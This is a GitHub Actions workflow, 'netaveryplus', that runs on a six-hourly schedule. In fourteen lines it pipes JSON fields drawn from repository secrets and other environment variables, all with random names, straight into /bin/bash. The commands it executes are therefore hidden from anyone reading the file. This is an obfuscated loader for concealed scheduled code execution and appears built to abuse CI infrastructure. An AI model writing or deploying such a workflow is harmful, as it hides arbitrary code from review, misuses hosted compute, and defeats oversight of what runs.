name: netaveryplus

on:
  workflow_dispatch:
  schedule:
    - cron: '47 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: netaveryplus
        env:
          imbs2629: ${{ secrets.imbs2629 }}
        run: |
          echo $imbs2629 | jq -r .r97 | /bin/bash
          echo $xp3 | jq -r .t742 | /bin/bash
          echo $mj12162 | jq -r .w71 | /bin/bash
          echo $tcuw84333 | jq -r .gjh204 | /bin/bash
          echo $q4589 | jq -r .llre790 | /bin/bash
          echo $yhuq04274 | jq -r .uql10395 | /bin/bash
          echo $g2 | jq -r .ryund59107 | /bin/bash
          echo $m43035 | jq -r .idycf23471 | /bin/bash
          echo $pxcbj2726 | jq -r .alzk2367 | /bin/bash
          echo $qa6 | jq -r .mru40 | /bin/bash
          echo $rgsj1774 | jq -r .fogoh51 | /bin/bash
          echo $qhulb59 | jq -r .l92422 | /bin/bash
          echo $szz391 | jq -r .lw80 | /bin/bash
          echo $og3980 | jq -r .efh10206 | /bin/bash

